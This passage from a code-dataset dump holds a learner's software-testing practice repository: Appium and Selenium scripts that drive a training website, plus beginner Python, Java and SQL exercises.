"/Project_5.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "import static org.testng.Assert.assertEquals;\r\n\r\nimport java.io.IOException;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.List;\r\nimport java.util.concurrent.TimeUnit;\r\n\r\nimport org.openqa.selenium.remote.DesiredCapabilities;\r\nimport org.openqa.selenium.remote.RemoteWebElement;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeTest;\r\nimport org.testng.annotations.Test;\r\n\r\nimport io.appium.java_client.AppiumDriver;\r\nimport io.appium.java_client.MobileBy;\r\nimport io.appium.java_client.MobileElement;\r\nimport io.appium.java_client.android.*;\r\npublic class Project_5 {\r\n\t@Test\r\n\tpublic void project_5() throws InterruptedException,IOException\r\n\r\n\t{\r\n\t\t\r\n\t\t\tWebDriverWait wait;\r\n\t\t\tDesiredCapabilities cap=new DesiredCapabilities();\r\n\t\t\tcap.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\t\tcap.setCapability(\"platformName\", \"Android\");\r\n\t cap.setCapability(\"appPackage\", \"com.android.chrome\");\r\n\t cap.setCapability(\"appActivity\", \"com.google.android.apps.chrome.Main\");\r\n\t cap.setCapability(\"noReset\", true);\r\n\t AppiumDriver<MobileElement> driver=null;\r\n\t driver=new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap);\r\n\t wait = new WebDriverWait(driver, 10);\r\n\t driver.manage().timeouts().implicitlyWait(30,TimeUnit.SECONDS);\r\n\t //driver.findElementById(\"terms_accept\").click();\r\n\t driver.get(\"https://www.training-support.net/selenium\");\r\n\t driver.findElementByXPath(\"//android.view.View/android.view.View[1]/android.view.View[1]/android.widget.Button\").click();\r\n\t \r\n\t driver.findElementByXPath(\"//android.view.View[3]/android.view.View/android.widget.EditText[1]\").sendKeys(\"admin\");\r\n\t driver.findElementByXPath(\"//android.view.View/android.view.View[3]/android.view.View/android.widget.EditText[2]\").sendKeys(\"password\");\r\n\t driver.findElementByXPath(\"//android.view.View/android.view.View[3]/android.view.View/android.widget.Button\").click();\r\n\t List<MobileElement> st =driver.findElementsByXPath(\"//android.webkit.WebView/android.view.View/android.view.View[1]/android.view.View[2]/android.view.View[3]\");\r\n\t String s=st.get(0).getText();\r\n\t System.out.println(s);\r\n\t String E=\"You tried to login using invalid credentials. Please try again.\";\r\n\t assertEquals(s,E);\r\n\t //android.view.View/android.view.View[3]/android.view.View/android.widget.EditText[2]\r\n\t \r\n\t}\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 30, "blob_id": "3323088e450c13305f944381f58bb6f9e99a36c1", "content_id": "ce4bebc5566ac70db3468d339d74c4e90d3f17db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/Multiplication.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "num=int(input(\"Enter number\"))" }, { "alpha_fraction": 0.7206704020500183, "alphanum_fraction": 0.7243947982788086, "avg_line_length": 36.35714340209961, "blob_id": "a5123210e9d70df1250d40a5a9e3e89ba94b9b5a", "content_id": "2ade245c2be350941f01b5d018bfd5c589698eff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Class_2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Selenium_activity2;\r\n\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\npublic class Class_2 {\r\n\tpublic static void main (String[] args)\r\n\t{\r\n\t\tWebDriver driver =new FirefoxDriver();\r\n\t\tdriver.get(\"https://www.training-support.net\");\r\n\t\tString title=driver.getTitle();\r\n\t\tSystem.out.println(\"Title os the page is \"+title);\r\n\t\tWebElement idLocator=driver.findElement(By.id(\"about-link\"));\r\n\t\tSystem.out.println(\"Text in element by id \"+idLocator.getText());\r\n\t\tWebElement Classnameloca= driver.findElement(By.className(\"green\"));\r\n\t\tSystem.out.println(\"Text in element by class name \"+Classnameloca.getText());\r\n\t\t\r\n\t\tWebElement csslocator=driver.findElement(By.cssSelector(\".green\"));\r\n\t\tSystem.out.println(\"Text in element by cs selector \"+csslocator.getText());\r\n\t\t\r\n\t\tWebElement linktext1=driver.findElement(By.linkText(\"About Us\"));\r\n\t System.out.println(\"Text in element by link text \"+linktext1.getText());\r\n\t driver.close();\r\n\t\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.3575129508972168, "alphanum_fraction": 0.4922279715538025, "avg_line_length": 16.899999618530273, "blob_id": "844fde3e3f196278fb5c7dbd9e2c4b8502690079", "content_id": "28d6e002803c8bcd3ebc9070ec5c2fae0c7967bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/combininglist.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "list1=[1,3,4,5,6,8,9]\r\nlist2=[2,6,8,7,0,5,1]\r\nlist3=[]\r\nfor i in list1:\r\n if(i%2!=0):\r\n list3.append(i)\r\nfor j in list2:\r\n if(j%2==0):\r\n list3.append(j)\r\nprint (list3)\r\n " }, { "alpha_fraction": 0.29646018147468567, "alphanum_fraction": 0.3185840845108032, "avg_line_length": 11.625, "blob_id": "7cd86ce06422cd93ea4c5ded2cb8be174cf2503f", "content_id": "6a582a85855c69307f183427394bd914add9ef60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 22, "num_lines": 16, "path": "/fab.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "def fab(N):\r\n a=1\r\n b=1\r\n i=0\r\n print(str(a))\r\n print(str(b))\r\n while (i<N):\r\n c=a+b\r\n print(str(c))\r\n a=b\r\n b=c\r\n \r\n i=i+1\r\n\r\nres=fab(6)\r\nprint (res)\r\n " }, { "alpha_fraction": 0.6327376961708069, "alphanum_fraction": 0.7161774039268494, "avg_line_length": 22.82889747619629, "blob_id": "cb6131608dcb4397c656ffa11d93f7024156c6fe", "content_id": "9aeaea6e2b75d2e5b160fd4d3440ccacbc559592", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 6268, "license_type": "no_license", "max_line_length": 59, "num_lines": 263, "path": "/sqlscript (1).sql", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "REM Script: SQL_activity1\nREM SQL activity1\n\ncreate table salesman( \nSalesman_id number;\n\nSalesman_name varchar2(32); \n\n\nSalesman_city varchar2(32); \n\n\ncommission Number; \n\n\n)\n\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \nSelect 1 from Dual;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \nSelect 1 from Dual;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\ninsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert ALL \ninto salesman values (5005,'PA','London',11) \ninto salesamn values(5006,'Mclyon', 'Paris',14) \ninto salesman values (5007,'PaulAdam','Rome',13) \ninto salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert into salesman values (5002,'Nail Knite','Paros',13);\n\nInsert ALL \n into salesman values (5005,'PA','London',11) \n into salesamn values(5006,'Mclyon', 'Paris',14) \n into salesman values (5007,'PaulAdam','Rome',13) \n into salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\nInsert ALL \n into salesman values (5005,'PA','London',11) \n into salesamn values(5006,'Mclyon', 'Paris',14) \n into salesman values (5007,'PaulAdam','Rome',13) \n into salesman values(5003,'Lauson Hen','SanJose',12) \n \nSelect 1 from DUAL;\n\ninsert into salesman values(5002,'NailKnite','Paris',13);\n\ninsert into salesman values(5002,'NailKnite','Paris',13);\n\ninsert into salesman values(5005,'BB','London',14);\n\ninsert into salesman values(5006,'CC','US',16);\n\ninsert into salesman values(5007,'DD','UK',17);\n\nINSERT ALL \ninto salesman values(5002,'NailKnite','Paris',13);\n\ninto salesman values(5005,'BB','London',14); \n\n\ninto salesman values(5006,'CC','US',16); \n\n\ninto salesman values(5007,'DD','UK',17);\n\n\nINSERT ALL \ninto salesman values(5002,'NailKnite','Paris',13) \ninto salesman values(5005,'BB','London',14) \ninto salesman values(5006,'CC','US',16) \ninto salesman values(5007,'DD','UK',17) \n \nselect * from DUAL;\n\nINSERT ALL \ninto salesman values(5002,'NailKnite','Paris',13) \ninto salesman values(5005,'BB','London',14) \ninto salesman values(5006,'CC','US',16) \ninto salesman values(5007,'DD','UK',17) \n \nselect * from DUAL;\n\nselect salesman_id,salesman_city from salesman;\n\nselect salesman_id,salesman_city from salesman;\n\nselect salesman_id,salesman_city from salesman;\n\nselect * from salesman where salesman_city='Paris';\n\nselect * from salesman where salesman_city='Paris';\n\nselect * from salesman where salesman_city='Paris';\n\nselect salesman_id,commission from salesman where \nsalesman_name='NailKnite';\n\nalter table salesman add grade int;\n\nupdate salesman set grade =100;\n\nupdate salesman set grade =100;\n\nselect * from salesman;\n\nselect * from salesman;\n\nupdate salesman set grade=200 \nwhere salesman_city='Paris';\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nupdate salesman set Grade=300 \nwhere salesman_name='BB';\n\nupdate salesman set Grade=300 \nwhere salesman_name='BB';\n\nupdate salesman set Grade=300 \nwhere salesman_name='BB';\n\nselect * from salesman;\n\nselect * from salesman \n \nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\nselect * from salesman \n \nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\nselect * from salesman \n \nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\n" }, { "alpha_fraction": 0.6068965792655945, "alphanum_fraction": 0.6758620738983154, "avg_line_length": 33.25, "blob_id": "b4e09f55cb9624acbd68bad293cf8da28900fd6b", "content_id": "612c52ac6c5c09270fd03d260d65711a3936a12a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 52, "num_lines": 4, "path": "/name_age1.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "name=input(\"Enter your name\")\r\nage=input(\"Enter your age\" )\r\nyear=(2020-int(age))+100\r\nprint(name+\"Will be100 years old in year\"+str(year))\r\n\r\n\r\n" }, { "alpha_fraction": 0.6661316156387329, "alphanum_fraction": 0.6709470152854919, "avg_line_length": 18.09677505493164, "blob_id": "f36d69bffa765ac30710e97f74478327a97160a6", "content_id": "fd4ffc2c6a929105e35a7fe9315036f4be1790fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 623, "license_type": "no_license", "max_line_length": 61, "num_lines": 31, "path": "/Car.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package JavaActivity1;\r\n\r\npublic class Car {\r\n\tString color;\r\n\tint make;\r\n\tString transmission;\r\n\tint tyers;\r\n\tint doors;\r\n\r\n\r\n\r\nCar(){\r\n\ttyers=4;\r\n\tdoors=4;\r\n\t\t\t\r\n}\r\npublic void displayCharacteristics() {\r\n\tSystem.out.println(\"Color of the Car:\"+color);\r\n\tSystem.out.println(\"make of the car:\"+make);\r\n\tSystem.out.println(\"Transmission of the car:\"+transmission);\r\n\tSystem.out.println(\"Number of doors on the Car:\"+doors);\r\n\tSystem.out.println(\"Number if tyres on the car:\"+tyers);\r\n\t\r\n}\r\npublic void accelerate() {\r\n\tSystem.out.println(\"Accelerating.\");\r\n}\r\npublic void brake() {\r\n\tSystem.out.println(\"Breaking\");\r\n}\r\n}\r\n" }, { "alpha_fraction": 0.6226851940155029, "alphanum_fraction": 0.6319444179534912, "avg_line_length": 16.869565963745117, "blob_id": "02c20722d90219712408e74e6a09dc7d78f3641a", "content_id": "6b86940a0281f678f735d9c0d9747e643d596a7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 432, "license_type": "no_license", "max_line_length": 40, "num_lines": 23, "path": "/Act_3.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_3_A;\r\n\r\nimport java.util.LinkedList;\r\nimport java.util.Queue;\r\n\r\npublic class Act_3 {\r\n\tpublic static void main( String args[])\r\n\t{\r\n\tQueue<Integer> q =new LinkedList<>();\r\n\t\r\n\tfor (int i =1; i<=5;i++)\r\n\t{\r\n\t\tq.add(i);\r\n\t}\r\n\tSystem.out.println(q);\r\n\tint remove_number=q.remove();\r\n\tSystem.out.println(remove_number);\r\n\tSystem.out.println(q.peek());\r\n\tSystem.out.println(q.size());\r\n\tSystem.out.println(q);\r\n\t\r\n\t}\r\n}" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.5192546844482422, "avg_line_length": 27.66666603088379, "blob_id": "638fc087717dbed1ba0cd9cec713e3dbc2f61b7a", "content_id": "4a0243090b2a049568006b4d4eb9bc6a3d71af81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 805, "license_type": "no_license", "max_line_length": 43, "num_lines": 27, "path": "/Rock_paper_loops.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "user1_answer=input(\"What is user1's reply\")\r\nuser2_answer=input(\"What is user2's reply\")\r\nwhile True:\r\n if user1_answer==user2_answer:\r\n print(\"its a tie\")\r\n elif user1_answer==\"rock\" :\r\n if user2_answer=='scissors':\r\n print(\"Rock wins\")\r\n else:\r\n print(\"Paper wins\")\r\n elif user1_answer=='scissors':\r\n if user2_answer=='paper':\r\n print(\"scissors win\")\r\n else:\r\n print(\"Rock wins!!!\")\r\n elif user1_answer=='paper':\r\n if user2_answer=='rock':\r\n print(\"paper wins\")\r\n else :\r\n print(\"scissors wins\")\r\n else :\r\n print(\"Invalid inpt\")\r\n repeat=input(\"Do you want to repeat\")\r\n if repeat==\"yes\":\r\n pass\r\n elif repeat==\"no\":\r\n raise SystemExit\r\n\r\n\r\n" }, { "alpha_fraction": 0.6479057669639587, "alphanum_fraction": 0.6609947681427002, "avg_line_length": 19.885713577270508, "blob_id": "b21363304ef605df8f225676eca1556c226644e4", "content_id": "668b9dccd8a3455fe8df3cbdf5959a25c5c208c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 764, "license_type": "no_license", "max_line_length": 62, "num_lines": 35, "path": "/CustomException.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_2_4;\r\n\r\nclass CustomException extends Exception {\r\n\tprivate String message=null ;\r\n\t\r\n\tpublic CustomException(String message) {\r\n\t\tthis.message=message;\r\n\t}\r\n @Override\r\n public String getMessage() {\r\n \treturn message;\r\n \r\n \t\t\t\t\t\t\t}\r\n}\r\n\r\n class Activity_2_4{\r\n\tpublic static void main(String[] a) {\r\n\ttry {\r\n\t\tActivity_2_4.exceptionTest(\"Will print to console\");\r\n\t\tActivity_2_4.exceptionTest(null);\r\n\t\tActivity_2_4.exceptionTest(\"ABC\");\r\n\t\t\r\n\t}catch(CustomException mae) {\r\n\t\tSystem.out.println(\"Inside catch bloack:\"+mae.getMessage());\r\n\t}\r\n} \r\nstatic void exceptionTest(String str)throws CustomException{\r\n\tif (str==null) {\r\n\t\tthrow new CustomException(\"String value is null\");\r\n\t}\r\n\telse \r\n\t{System.out.println(str);\r\n\t}\r\n}\r\n}" }, { "alpha_fraction": 0.566724419593811, "alphanum_fraction": 0.5875216722488403, "avg_line_length": 25.285715103149414, "blob_id": "0b603f91af2d5052452456693980743e308e9297", "content_id": "a9a9b1f7d02370d0ee0e2bf4b2213b8566817b9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 43, "num_lines": 21, "path": "/Rockpaper.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "user1_answer=input(\"What is user1's reply\")\r\nuser2_answer=input(\"What is user2's reply\")\r\nif user1_answer==user2_answer:\r\n print(\"its a tie\")\r\nelif user1_answer==\"rock\" :\r\n if user2_answer=='scissors':\r\n print(\"Rock wins\")\r\n else:\r\n print(\"Paper wins\")\r\nelif user1_answer=='scissors':\r\n if user2_answer=='paper':\r\n print(\"scissors win\")\r\n else:\r\n print(\"Rock wins!!!\")\r\nelif user1_answer=='paper':\r\n if user2_answer=='rock':\r\n print(\"paper wins\")\r\n else :\r\n print(\"scissors wins\")\r\nelse :\r\n print(\"Invalid inpt\")\r\n\r\n\r\n" }, { "alpha_fraction": 0.4883720874786377, "alphanum_fraction": 0.5581395626068115, "avg_line_length": 20.5, "blob_id": "582f02675aaf20634540935ab8ed244f31ff94cf", "content_id": "2d149cf70edba830f8ebe68faf977def6368dcce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 43, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/pattern.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "for i in range (1,10):\r\n print(str(i)*i)" }, { "alpha_fraction": 0.30434781312942505, "alphanum_fraction": 0.47826087474823, "avg_line_length": 15.75, "blob_id": "277d91f9f5bbacb050c5e0b3ee7f40052aeb3b39", "content_id": "73158fb92294a1c9516d3168433bbb827a242bb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 19, "num_lines": 4, "path": "/tuplenumberchecker.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "tup1=(1,5,10,20,44)\r\nfor i in tup1:\r\n if i%5==0:\r\n print(i)" }, { "alpha_fraction": 0.6636427044868469, "alphanum_fraction": 0.6810886263847351, "avg_line_length": 43.90322494506836, "blob_id": "d181c823ed8fe1e375ea6e7a68ab8f60a9fcd312", "content_id": "bfac629888fa3e0d3476564c67077b6b8e5b63e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2866, "license_type": "no_license", "max_line_length": 176, "num_lines": 62, "path": "/Project1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "import java.io.IOException;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.concurrent.TimeUnit;\r\n\r\nimport org.openqa.selenium.remote.DesiredCapabilities;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeTest;\r\nimport org.testng.annotations.Test;\r\n\r\nimport io.appium.java_client.AppiumDriver;\r\nimport io.appium.java_client.MobileElement;\r\nimport io.appium.java_client.android.*;\r\npublic class Project1 {\r\n\t@Test\r\n\tpublic void calc() throws InterruptedException,IOException\r\n\t{ \r\n\t\tWebDriverWait wait;\r\n\t\tDesiredCapabilities cap=new DesiredCapabilities();\r\n\t\tDesiredCapabilities cap1=new DesiredCapabilities();\r\n\t\t/*cap.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\tcap.setCapability(\"platformName\", \"Android\");\r\n cap.setCapability(\"appPackage\", \"com.google.android.apps.tasks\");\r\n cap.setCapability(\"appActivity\", \"com.google.android.apps.tasks.ui.TaskListsActivity\");\r\n //cap.setCapability(\"appWaitPackage\", \"package.android\");\r\n //cap.setCapability(\"appWaitActivity\", \"com.google.android.apps.tasks.ui.taskListsActivity\");\r\n //cap.setCapability(\"appWaitDuration\", 10000);\r\n cap.setCapability(\"noReset\", true);*/\r\n AppiumDriver<MobileElement> driver=null;\r\n // driver=new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap);\r\n //driver.manage().timeouts().implicitlyWait(10000,TimeUnit.SECONDS);\r\n //wait = new WebDriverWait(driver, 10);\r\n /*driver.manage().timeouts().implicitlyWait(1000,TimeUnit.SECONDS);\r\n driver.findElementById(\"tasks_fab\").click();\r\n driver.findElementById(\"add_task_title\").sendKeys(\"Surbhi\");\r\n driver.findElementById(\"add_task_done\").click();*/\r\n cap1.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\tcap1.setCapability(\"platformName\", \"Android\");\r\n cap1.setCapability(\"appPackage\", \"com.google.android.keep\");\r\n cap1.setCapability(\"appActivity\", \"com.google.android.keep.activities.BrowseActivity\");\r\n cap.setCapability(\"noReset\", true);\r\n \r\n driver=new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap1);\r\n driver.manage().timeouts().implicitlyWait(1000,TimeUnit.SECONDS);\r\n driver.findElementById(\"new_note_button\").click();\r\n \r\n String st = driver.findElementById(\"index_note_title\").getText();\r\n System.out.println(st);\r\n //driver.findElementByXPath(\"//androidx.cardview.widget.CardView[@content-desc=\\\". \\\"])[1]/android.widget.LinearLayout/android.widget.LinearLayout\").sendKeys(\"Surbhi\");\r\n driver.findElementById(\"edit_note_text\").sendKeys(\"BAhl\");\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\t}\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6512488722801208, "alphanum_fraction": 0.6679000854492188, "avg_line_length": 31.78125, "blob_id": "675125991c9146e4a9817932bdff238b155f2c0b", "content_id": "755f5699929ff6acff544077ae420390acfca7af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 105, "num_lines": 32, "path": "/Activity_4_3.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_4_3;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\n\r\npublic class Activity_4_3 {\r\n\t\r\n\tpublic static void main (String args[])\r\n\t{\r\n\t\tWebDriver driver=new FirefoxDriver();\r\n\t\tdriver.get(\"https://www.training-support.net/selenium/target-practice\");\r\n\t\tString title=driver.getTitle();\r\n\t\tString text1=driver.findElement(By.xpath(\"//h3[@id='third-header']\")).getText();\r\n\t\tSystem.out.println(\"text1=======\"+text1);\r\n\t\tString text2=driver.findElement(By.xpath(\"//h5\")).getCssValue(\"color\");\r\n\t\tSystem.out.println(\"text2=======\"+text2);\r\n\t\tString text3=driver.findElement(By.xpath(\"//button[contains(text(),'Violet')]\")).getAttribute(\"class\");\r\n\t\tSystem.out.println(\"text3=======\"+text3);\r\n\t\tString text4=driver.findElement(By.xpath(\"//button[@class='ui grey button']\")).getText();\r\n\t\tSystem.out.println(\"Printing********************\");\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\tSystem.out.println(\"text4=======\"+text4);\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.42553192377090454, "alphanum_fraction": 0.4498480260372162, "avg_line_length": 21.923076629638672, "blob_id": "9d4d8b2e1585ab9e89ad4c932e961a3e3f3cfd6a", "content_id": "9617cc85c5befd2b6eb60d0fca982166b75617da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 47, "num_lines": 13, "path": "/Fruit_basket.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "fruit_basket={\"apple\":24,\r\n \"Mango\":12,\r\n \"Pear\":10,\r\n \"Banana\":15}\r\nfruit=input(\"Enter the fruit you want to find\")\r\nfor i in fruit_basket:\r\n #print (i )\r\n #print (fruit)\r\n if i==fruit:\r\n print(\"Its Present\")\r\n break\r\n else :\r\n continue\r\n \r\n\r\n\r\n " }, { "alpha_fraction": 0.43617022037506104, "alphanum_fraction": 0.5531914830207825, "avg_line_length": 14, "blob_id": "6daa78437ed8be7c05d1d6a8a378d4a71e9e0dbd", "content_id": "128e74d84dd051dfbde3e0259b92337b082439f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 23, "num_lines": 6, "path": "/list1.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "list1=[1,2,3,4,5,6,7,8]\r\nsum=0\r\nfor i in list1:\r\n print(i)\r\n sum=sum+int(i)\r\nprint (sum)" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7632575631141663, "avg_line_length": 41.91666793823242, "blob_id": "b7a2156f71f54814c6ec33710fd2a0e0e39e4134", "content_id": "4f88c0007c16d3d880081aa3698614f7f3a6bcf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 99, "num_lines": 24, "path": "/Activity_6_2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_6_2;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.openqa.selenium.support.ui.ExpectedConditions;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\npublic class Activity_6_2 {\r\n\tpublic static void main(String args[])\r\n\t{\r\n\tWebDriver driver=new FirefoxDriver();\r\n\tWebDriverWait wait =new WebDriverWait(driver,10);\r\n\tdriver.get(\"https://training-support.net/selenium/ajax\");\r\n\tdriver.findElement(By.xpath(\"//button[contains(@class,'violet')]\")).click();\r\n\twait.until(ExpectedConditions.textToBePresentInElementLocated(By.id(\"ajax-content\"),\"HELLO!\"));\r\n\tString ajaxText=driver.findElement(By.id(\"ajax-content\")).getText();\r\n\tSystem.out.println(ajaxText);\r\n\twait.until(ExpectedConditions.textToBePresentInElementLocated(By.id(\"ajax-content\"),\"I'm late!\"));\r\n\tString lateText=driver.findElement(By.id(\"ajax-content\")).getText();\r\n\tSystem.out.println(lateText);\r\n\t}\r\n\r\n}\r\n\r\n" }, { "alpha_fraction": 0.5515695214271545, "alphanum_fraction": 0.5582959651947021, "avg_line_length": 17.39130401611328, "blob_id": "2915054d89bbb9d96699ee83683a9452b4aff5e8", 